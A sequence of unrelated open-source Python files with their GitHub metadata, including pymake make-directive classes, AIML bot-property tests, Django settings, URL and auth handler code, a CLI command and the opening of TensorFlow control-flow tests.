__slots__ = ('exp',)
def __init__(self, exp):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
def execute(self, makefile, context):
words = list(data.stripdotslashes(self.exp.resolvesplit(makefile, makefile.variables)))
if len(words) == 0:
makefile.clearallvpaths()
else:
pattern = data.Pattern(words[0])
mpaths = words[1:]
if len(mpaths) == 0:
makefile.clearvpath(pattern)
else:
dirs = []
for mpath in mpaths:
dirs.extend((dir for dir in mpath.split(os.pathsep)
if dir != ''))
if len(dirs):
makefile.addvpath(pattern, dirs)
def dump(self, fd, indent):
print("%sVPath %s" % (indent, self.exp), file=fd)
def to_source(self):
return 'vpath %s' % self.exp.to_source()
def __eq__(self, other):
if not isinstance(other, VPathDirective):
return False
return self.exp == other.exp
class ExportDirective(Statement):
"""
Represents the "export" directive.
This is used to control exporting variables to sub makes.
See https://www.gnu.org/software/make/manual/make.html#Variables_002fRecursion
The `concurrent_set` field defines whether this statement occurred with or
without a variable assignment. If False, no variable assignment was
present. If True, the SetVariable immediately following this statement
originally came from this export directive (the parser splits it into
multiple statements).
"""
__slots__ = ('exp', 'concurrent_set')
def __init__(self, exp, concurrent_set):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
self.concurrent_set = concurrent_set
def execute(self, makefile, context):
if self.concurrent_set:
vlist = [self.exp.resolvestr(makefile, makefile.variables)]
else:
vlist = list(self.exp.resolvesplit(makefile, makefile.variables))
if not len(vlist):
raise errors.DataError("Exporting all variables is not supported", self.exp.loc)
for v in vlist:
makefile.exportedvars[v] = True
def dump(self, fd, indent):
print("%sExport (single=%s) %s" % (indent, self.single, self.exp), file=fd)
def to_source(self):
return ('export %s' % self.exp.to_source()).rstrip()
def __eq__(self, other):
if not isinstance(other, ExportDirective):
return False
        # concurrent_set is irrelevant because it just says whether the next
        # Statement contains a variable definition.
return self.exp == other.exp
class UnexportDirective(Statement):
"""
Represents the "unexport" directive.
This is the opposite of ExportDirective.
"""
__slots__ = ('exp',)
def __init__(self, exp):
self.exp = exp
def execute(self, makefile, context):
vlist = list(self.exp.resolvesplit(makefile, makefile.variables))
for v in vlist:
makefile.exportedvars[v] = False
def dump(self, fd, indent):
print("%sUnexport %s" % (indent, self.exp), file=fd)
def to_source(self):
return 'unexport %s' % self.exp.to_source()
def __eq__(self, other):
if not isinstance(other, UnexportDirective):
return False
return self.exp == other.exp
class EmptyDirective(Statement):
"""
Represents a standalone statement, usually an Expansion.
You will encounter EmptyDirective instances if there is a function
or similar at the top-level of a make file (e.g. outside of a rule or
variable assignment). You can also find them as the bodies of
ConditionBlock branches.
"""
__slots__ = ('exp',)
def __init__(self, exp):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
def execute(self, makefile, context):
v = self.exp.resolvestr(makefile, makefile.variables)
if v.strip() != '':
raise errors.DataError("Line expands to non-empty value", self.exp.loc)
def dump(self, fd, indent):
print("%sEmptyDirective: %s" % (indent, self.exp), file=fd)
def to_source(self):
return self.exp.to_source()
def __eq__(self, other):
if not isinstance(other, EmptyDirective):
return False
return self.exp == other.exp
class _EvalContext(object):
__slots__ = ('currule', 'weak')
def __init__(self, weak):
self.weak = weak
class StatementList(list):
"""
A list of Statement instances.
This is what is generated by the parser when a make file is parsed.
Consumers can iterate over all Statement instances in this collection to
statically inspect (and even modify) make files before they are executed.
"""
__slots__ = ('mtime',)
def append(self, statement):
assert isinstance(statement, Statement)
list.append(self, statement)
def execute(self, makefile, context=None, weak=False):
if context is None:
context = _EvalContext(weak=weak)
for s in self:
s.execute(makefile, context)
def dump(self, fd, indent):
for s in self:
s.dump(fd, indent)
def __str__(self):
fd = StringIO()
self.dump(fd, '')
return fd.getvalue()
def to_source(self):
return '\n'.join([s.to_source() for s in self])
def iterstatements(stmts):
for s in stmts:
yield s
if isinstance(s, ConditionBlock):
for c, sl in s:
                for s2 in iterstatements(sl):
                    yield s2
| {
"content_hash": "c1ab9148be34215d890f27e81089ace1",
"timestamp": "",
"source": "github",
"line_count": 1015,
"max_line_length": 146,
"avg_line_length": 33.02660098522168,
"alnum_prop": 0.5958176719766124,
"repo_name": "mozilla/pymake",
"id": "833b06e73caf98ed9b63c22012c6f5d4ced56244",
"size": "33522",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pymake/parserdata.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "24"
},
{
"name": "C++",
"bytes": "130"
},
{
"name": "Python",
"bytes": "231366"
},
{
"name": "Shell",
"bytes": "73"
}
],
"symlink_target": ""
} |
import unittest
import os
from test.aiml_tests.client import TestClient
from programy.config.brain import BrainFileConfiguration
class BasicTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_configuration(self, arguments):
super(BasicTestClient, self).load_configuration(arguments)
self.configuration.brain_configuration._aiml_files = BrainFileConfiguration(files=os.path.dirname(__file__))
class BotAIMLTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
BotAIMLTests.test_client = BasicTestClient()
BotAIMLTests.test_client.bot.brain.properties.load_from_text("""
url:http://www.keithsterling.com/aiml
name:KeiffBot 1.0
firstname:Keiff
middlename:AIML
lastname:BoT
fullname:KeiffBot
email:[email protected]
gender:male
botmaster:Keith Sterling
organization:keithsterling.com
version:0.0.1
birthplace:Edinburgh, Scotland
job:mobile virtual assistant
species:robot
birthday:September 9th
birthdate:September 9th, 2016
sign:Virgo
logo:<img src="http://www.keithsterling.com/aiml/logo.png" width="128"/>
religion:Atheist
default-get:unknown
default-property:unknown
default-map:unknown
learn-filename:learn.aiml
""")
def test_bot_property_xxx(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY XXX")
self.assertIsNotNone(response)
self.assertEqual(response, "unknown")
def test_bot_property_url(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY URL")
self.assertIsNotNone(response)
self.assertEqual(response, "http://www.keithsterling.com/aiml")
def test_bot_property_name(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY NAME")
self.assertIsNotNone(response)
self.assertEqual(response, "KeiffBot 1.0")
def test_bot_property_firstname(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY FIRSTNAME")
self.assertIsNotNone(response)
self.assertEqual(response, "Keiff")
def test_bot_property_middlename(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY MIDDLENAME")
self.assertIsNotNone(response)
self.assertEqual(response, "AIML")
def test_bot_property_lastname(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY LASTNAME")
self.assertIsNotNone(response)
self.assertEqual(response, "BoT")
def test_bot_property_email(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY EMAIL")
self.assertIsNotNone(response)
self.assertEqual(response, "[email protected]")
def test_bot_property_gender(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY GENDER")
self.assertIsNotNone(response)
self.assertEqual(response, "male")
def test_bot_property_botmaster(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY BOTMASTER")
self.assertIsNotNone(response)
self.assertEqual(response, "Keith Sterling")
def test_bot_property_organisation(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY ORGANISATION")
self.assertIsNotNone(response)
self.assertEqual(response, "keithsterling.com")
def test_bot_property_version(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY VERSION")
self.assertIsNotNone(response)
self.assertEqual(response, "0.0.1")
def test_bot_property_birthplace(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY BIRTHPLACE")
self.assertIsNotNone(response)
self.assertEqual(response, "Edinburgh, Scotland")
def test_bot_property_birthday(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY BIRTHDAY")
self.assertIsNotNone(response)
self.assertEqual(response, "September 9th")
def test_bot_property_sign(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY SIGN")
self.assertIsNotNone(response)
self.assertEqual(response, "Virgo")
def test_bot_property_birthdate(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY BIRTHDATE")
self.assertIsNotNone(response)
self.assertEqual(response, "September 9th, 2016")
def test_bot_property_job(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY JOB")
self.assertIsNotNone(response)
self.assertEqual(response, "mobile virtual assistant")
def test_bot_property_species(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY SPECIES")
self.assertIsNotNone(response)
self.assertEqual(response, "robot")
def test_bot_property_religion(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY RELIGION")
self.assertIsNotNone(response)
self.assertEqual(response, "No religion, I am an Atheist")
def test_bot_property_logo(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY LOGO")
self.assertIsNotNone(response)
self.assertEqual(response, '<img src="http://www.keithsterling.com/aiml/logo.png" width="128"/>')
def test_bot_property_default_get(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY DEFAULT GET")
self.assertIsNotNone(response)
self.assertEqual(response, "unknown")
def test_bot_property_default_map(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY DEFAULT MAP")
self.assertIsNotNone(response)
self.assertEqual(response, "unknown")
def test_bot_property_default_property(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY DEFAULT PROPERTY")
self.assertIsNotNone(response)
self.assertEqual(response, "unknown")
def test_bot_property_default_learn_filename(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY LEARN FILENAME")
self.assertIsNotNone(response)
self.assertEqual(response, "learn.aiml")
| {
"content_hash": "2e4db7b2e870c148d967bb8ec2ee992f",
"timestamp": "",
"source": "github",
"line_count": 159,
"max_line_length": 116,
"avg_line_length": 42.61635220125786,
"alnum_prop": 0.6790141676505312,
"repo_name": "dkamotsky/program-y",
"id": "26e8e54f2ce29635e7ef91b193d49c3101d35fcb",
"size": "6776",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/test/aiml_tests/bot_tests/test_bot_aiml.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "937"
},
{
"name": "HTML",
"bytes": "1583"
},
{
"name": "Python",
"bytes": "1131157"
},
{
"name": "Shell",
"bytes": "3481"
}
],
"symlink_target": ""
} |
import numpy as np
def extremum(points, comp):
    # Track the most extreme x and y seen so far, seeded from the first point.
    ext_x = points[0][0]
    ext_y = points[0][1]
    for point in points:
        if comp(point[0], ext_x) < 0:
            ext_x = point[0]
        if comp(point[1], ext_y) < 0:
            ext_y = point[1]
    return np.array([ext_x, ext_y])
def upperright(points):
    return extremum(points, lambda a, b: -cmp(a, b))
def bottomleft(points):
    return extremum(points, cmp)
class Grid:
    def __init__(self, mesh, resolution):
        self.grid = {}
        self.resolution = resolution
        coord = mesh.coordinates()
        #box coordinates
        bleft = bottomleft(coord)
        uright = upperright(coord)
        grid = self.grid
        for x in np.arange(bleft[0], uright[0], resolution):
            for y in np.arange(bleft[1], uright[1], resolution):
                grid[(x, y)] = []
        #now that grid is constructed, start dumping points in, keyed by the
        #lower-left corner of the cell containing each point (setdefault guards
        #against round-off producing a key the loops above did not create)
        for point in coord:
            cell = (bleft[0] + resolution * ((point[0] - bleft[0]) // resolution),
                    bleft[1] + resolution * ((point[1] - bleft[1]) // resolution))
            grid.setdefault(cell, []).append(point)
        #now, at each grid point, dump in the nearest adjacent set of
        #points. If the list is still empty, extend radius
        for point in grid:
            offsetx = range(-1, 1)
| {
"content_hash": "927adcc59f7bc2e1649c09147faae2fa",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 63,
"avg_line_length": 24.317073170731707,
"alnum_prop": 0.6820461384152458,
"repo_name": "cwgreene/Nanostructure-Simulator",
"id": "d32999fe9561b02ec597beeb3749f2b006b65e9c",
"size": "997",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "grid.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "16108"
},
{
"name": "C++",
"bytes": "70367"
},
{
"name": "Python",
"bytes": "92258"
}
],
"symlink_target": ""
} |
from django.apps import AppConfig
class SolveitappConfig(AppConfig):
name = 'solveitapp'
| {
"content_hash": "86f3d7532e9c047727d5ecb88b269cb5",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 34,
"avg_line_length": 19,
"alnum_prop": 0.7684210526315789,
"repo_name": "kiss90benedek/solveit",
"id": "52b8720a800625dec088f01e0d03683e15f35b41",
"size": "95",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "solveit/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1472"
},
{
"name": "JavaScript",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "11482"
},
{
"name": "Shell",
"bytes": "133"
}
],
"symlink_target": ""
} |
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = (
'djcelery_email',
'appconf',
)
SECRET_KEY = 'unique snowflake'
# Django 1.7 throws dire warnings if this is not set.
# We don't actually use any middleware, given that there are no views.
MIDDLEWARE_CLASSES = ()
CELERY_EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
CELERY_EMAIL_TASK_CONFIG = {
'queue': 'django_email',
'delivery_mode': 1, # non persistent
'rate_limit': '50/m', # 50 chunks per minute
}
| {
"content_hash": "bc1ed0da7a94e270024a4655be576092",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 70,
"avg_line_length": 23.28,
"alnum_prop": 0.6408934707903781,
"repo_name": "pmclanahan/django-celery-email",
"id": "e82c03e9ac9dbc61de27ef7878e00c30adda87ff",
"size": "582",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "26879"
},
{
"name": "Shell",
"bytes": "169"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
from tastypie.api import Api
from sxsw.api import PresenterResource, EventResource, TagResource
from django.views.generic import RedirectView, TemplateView
import settings
# API resources
v1_api = Api(api_name='v1')
v1_api.register(PresenterResource())
v1_api.register(EventResource())
v1_api.register(TagResource())
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'sxswtweets.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^api/', include(v1_api.urls)),
url(r'^sxsw/', include('sxsw.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^favicon\.ico$', RedirectView.as_view(url='http://' + settings.CLOUDFRONT_DOMAIN + settings.STATIC_DIRECTORY+ 'favicon.ico')),
url(r'^$', TemplateView.as_view(template_name='index.html')),
)
# if settings.DEBUG:
urlpatterns += patterns('',
url(r'^search/', include('haystack.urls')),
url(r'^autocomplete/', TemplateView.as_view(template_name='search/autocomplete.html'))
)
print settings.STATIC_URL + 'favicon.ico' | {
"content_hash": "ba838ea40249c6d9171046cdb846b8b7",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 136,
"avg_line_length": 31.666666666666668,
"alnum_prop": 0.7035087719298245,
"repo_name": "laud/upword-notes-sxsw",
"id": "eb54a108e61a6601b450a9122f0d58d0a3c5c78a",
"size": "1140",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sxswtweets/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "18719"
},
{
"name": "JavaScript",
"bytes": "24229"
},
{
"name": "Python",
"bytes": "53664"
}
],
"symlink_target": ""
} |
import datetime
from sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound
from workin.utils import importlib
NOW = datetime.datetime.now
class AuthHandlerMixin(object):
def __init__(self, *args, **kwargs):
super(AuthHandlerMixin, self).__init__(*args, **kwargs)
ext_path = 'workin.exts.auth'
self.require_setting('auth_user_model', ext_path)
self.require_setting('auth_session_key', ext_path)
self.require_setting('auth_cookie_key', ext_path)
self._auth_user = importlib.load_class(self.settings['auth_user_model'])
self._auth_session_key = self.settings['auth_session_key']
self._auth_cookie_key = self.settings['auth_cookie_key']
def authenticate(self, username, password):
"""Authenticates against `username` and `password`."""
try:
user = (self.db.query(self._auth_user)
.filter(self._auth_user.username == username).one())
if user.check_password(password):
return user
else:
return None
except (NoResultFound, MultipleResultsFound):
return None
def register(self, **kwargs):
"""Create an user.
If `next_url` is specified, redirect to it at last.
"""
next_url = kwargs.pop('next_url', None)
password = kwargs.pop('password')
user = self._auth_user(**kwargs)
user.set_password(password)
user.date_joined = NOW()
self.db.add(user)
self.db.commit()
if next_url:
self.redirect(next_url)
return user
def login(self, user, next_url=None):
"""Persist a user id and send session id as a cookie.
This way a user doesn't have to reauthenticate on every request.
If `next_url` is specified, redirect to it at last.
"""
user.last_login = NOW()
self.db.merge(user)
self.db.commit()
self.session[self._auth_session_key] = user.id
self.session.save()
# scanv login
# self.set_secure_cookie(self._auth_cookie_key, self.session.session_id,
# domain=self.settings.get('auth_cookie_domain', None),
# path=self.settings.get('auth_cookie_path', '/'),
# expires_days=self.settings.get('auth_cookie_expire_days'))
if next_url:
self.redirect(next_url)
def logout(self, next_url=None):
"""Removes the authenticated user's ID and clear cookies.
If `next_url` is specified, redirect to it at last.
"""
self.session.pop(self._auth_session_key, None)
self.session.save()
self.clear_cookie(self._auth_cookie_key)
if next_url:
self.redirect(next_url)
def get_current_user(self):
if self._auth_session_key in self.session:
user_id = self.session[self._auth_session_key]
user = (self.db.query(self._auth_user)
.filter(self._auth_user.id == user_id).first())
return user
return None
| {
"content_hash": "77d66ebde4f747ee5b57abda174f769f",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 80,
"avg_line_length": 32.97872340425532,
"alnum_prop": 0.5890322580645161,
"repo_name": "knownsec/workin",
"id": "4553939f4b8de8645064bbfd603a8c8bce847368",
"size": "3147",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "workin/exts/auth/handlers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "47912"
},
{
"name": "JavaScript",
"bytes": "281811"
},
{
"name": "Python",
"bytes": "102019"
},
{
"name": "Shell",
"bytes": "62"
}
],
"symlink_target": ""
} |
import catoclient.catocommand
from catoclient.param import Param
class ListUsers(catoclient.catocommand.CatoCommand):
Description = 'Lists Users'
API = 'list_users'
Examples = '''
_List all users_
cato-list-users
_List all users with Administrator role_
cato-list-users -f "Administrator"
'''
Options = [Param(name='filter', short_name='f', long_name='filter',
optional=True, ptype='string',
doc='''A string to use to filter the resulting data. Any row of data that has one field contains the string will be returned.''')]
def main(self):
results = self.call_api(self.API, ['filter'])
print(results)
| {
"content_hash": "feb005d911ef8dcd4a7e5ea6f1b6a68e",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 151,
"avg_line_length": 28.875,
"alnum_prop": 0.6479076479076479,
"repo_name": "cloudsidekick/catoclient",
"id": "4a470f9e05e5c91e16d15d213faa9fb65fa9b24f",
"size": "1419",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "catoclient/commands/listusers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "227800"
},
{
"name": "Ruby",
"bytes": "1000"
},
{
"name": "Tcl",
"bytes": "3573"
}
],
"symlink_target": ""
} |
"""Tests for tensorflow.ops.control_flow_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import cond_v2 # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gen_logging_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import while_v2 # pylint: disable=unused-import
# pylint: disable=unused-import
import tensorflow.python.ops.tensor_array_grad
# pylint: enable=unused-import
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.util import nest
def check_consumers(graph):
"""Sanity check on the consumer list of the tensors."""
consumer_count = {}
for op in graph.get_operations():
for v in op.inputs:
cnt = consumer_count.get(v, 0)
consumer_count[v] = cnt + 1
for k, v in consumer_count.items():
if len(k.consumers()) != v:
return False
return True
def all_fetchables():
tensor_names = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.outputs:
if graph.is_fetchable(t):
tensor_names.append(t.name)
return tensor_names
def all_feedables():
feedable_tensors = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_feedable(t):
feedable_tensors.append(t)
return feedable_tensors
def opt_cfg():
return config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(
opt_level=config_pb2.OptimizerOptions.L1,
do_function_inlining=True,
do_constant_folding=True)))
def isum(s, maximum_iterations=None):
i = constant_op.constant(0, name="i")
c = lambda i, s: math_ops.less(i, 10)
b = lambda i, s: [math_ops.add(i, 1), math_ops.add(i, s)]
_, r_s = control_flow_ops.while_loop(
c, b, [i, s], maximum_iterations=maximum_iterations)
return r_s
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testRefIdentity(self):
with self.cached_session():
v = variables.VariableV1(7)
v = control_flow_ops._Identity(v)
op = state_ops.assign(v, 9)
v2 = control_flow_ops.with_dependencies([op], v)
self.assertTrue(isinstance(v2, ops.Tensor))
variables.global_variables_initializer().run()
self.assertEqual(9, v2.eval())
def testRefEnter(self):
with self.cached_session():
v = variables.VariableV1(7)
enter_v = control_flow_ops._Enter(v, "foo_1", is_constant=True)
nine = constant_op.constant(9)
enter_nine = gen_control_flow_ops.enter(nine, "foo_1")
op = state_ops.assign(enter_v, enter_nine)
v2 = control_flow_ops.with_dependencies([op], enter_v)
v3 = control_flow_ops.exit(v2)
variables.global_variables_initializer().run()
self.assertEqual(9, v3.eval())
def testRefSwitch(self):
with self.cached_session():
v = variables.VariableV1(7)
p = constant_op.constant(True)
v1 = control_flow_ops._SwitchRefOrTensor(v._ref(), p) # pylint: disable=protected-access
v2 = state_ops.assign(v1[1], 9)
variables.global_variables_initializer().run()
self.assertEqual(9, v2.eval())
def testEnterMulExit(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
enter_data = gen_control_flow_ops.enter(data, "foo_1", False)
five = constant_op.constant(5)
enter_five = gen_control_flow_ops.enter(five, "foo_1", False)
mul_op = math_ops.multiply(enter_data, enter_five)
exit_op = control_flow_ops.exit(mul_op)
result = exit_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testEnterShapePropagation(self):
with self.cached_session():
v = variables.Variable([0.0, 0.0], dtype=dtypes.float32)
# If is_constant=True, the shape information should be propagated.
enter_v_constant = gen_control_flow_ops.enter(
v, "frame1", is_constant=True)
self.assertEqual(enter_v_constant.shape, [2])
# Otherwise, the shape should be unknown.
enter_v_non_constant = gen_control_flow_ops.enter(
v, "frame2", is_constant=False)
self.assertEqual(enter_v_non_constant.shape, None)
def testSwitchMergeIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([1, 2, 3, 4, 5, 6])
indices = constant_op.constant([0, 2, 4, 6, 8, 10])
data = ops.IndexedSlices(values, indices)
pred = ops.convert_to_tensor(True)
switch_op = control_flow_ops.switch(data, pred)
merge_op = control_flow_ops.merge(switch_op)[0]
val = merge_op.values.eval()
ind = merge_op.indices.eval()
self.assertAllEqual(np.arange(1, 7), val)
self.assertAllEqual(np.arange(0, 12, 2), ind)
def testSwitchDeadBranch(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
dead_branch = array_ops.identity(switch_op[0])
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError,
lambda e: "Retval[0] does not have value" in str(e)):
dead_branch.eval()
def testSwitchMergeLess(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
zero = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
less_op = math_ops.less(zero, one)
switch_op = control_flow_ops.switch(data, less_op)
merge_op = control_flow_ops.merge(switch_op)[0]
result = merge_op.eval()
self.assertAllEqual(np.arange(1, 7), result)
def testSwitchMergeAddIdentity(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(False, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
id_op = array_ops.identity(switch_op[1])
merge_op = control_flow_ops.merge([add_op, id_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x + 1 for x in [1, 2, 3, 4, 5, 6]]), result)
def testSwitchMergeAddMul(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
five = constant_op.constant(5)
mul_op = math_ops.multiply(switch_op[1], five)
merge_op = control_flow_ops.merge([add_op, mul_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testLoop_false(self):
with self.cached_session():
false = ops.convert_to_tensor(False)
n = constant_op.constant(10)
enter_false = gen_control_flow_ops.enter(false, "foo_1", False)
enter_n = gen_control_flow_ops.enter(n, "foo_1", False)
merge_n = control_flow_ops.merge([enter_n, enter_n], name="merge_n")[0]
switch_n = control_flow_ops.switch(merge_n, enter_false)
exit_n = control_flow_ops.exit(switch_n[0])
next_n = control_flow_ops.next_iteration(switch_n[0])
merge_n.op._update_input(1, next_n)
result = exit_n.eval()
self.assertAllEqual(10, result)
def testLoop_1(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
with ops.device(test.gpu_device_name()):
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testLoop_2(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
with ops.device(test.gpu_device_name()):
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testDifferentFrame(self):
with self.cached_session():
data = array_ops.placeholder(dtypes.float32, shape=[])
enter_1 = gen_control_flow_ops.enter(data, "foo_1", False)
enter_2 = gen_control_flow_ops.enter(data, "foo_2", False)
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError("has inputs from different frames"):
res.eval(feed_dict={data: 1.0})
@test_util.disable_control_flow_v2("b/113294340")
def testCondBool(self):
values = constant_op.constant(10)
fn1 = lambda: math_ops.add(values, 1)
fn2 = lambda: math_ops.subtract(values, 1)
with self.assertRaisesRegexp(TypeError, "must not be a Python bool"):
_ = control_flow_ops.cond(False, fn1, fn2)
def testCondInt(self):
p = array_ops.placeholder(dtypes.bool, shape=[])
v = constant_op.constant(10)
fn1 = lambda: math_ops.add(v, 1)
fn2 = lambda: math_ops.subtract(v, 1)
y = control_flow_ops.cond(p, fn1, fn2)
grad = gradients_impl.gradients(y, [v])
self.assertAllEqual([None], grad)
def testFetchable(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
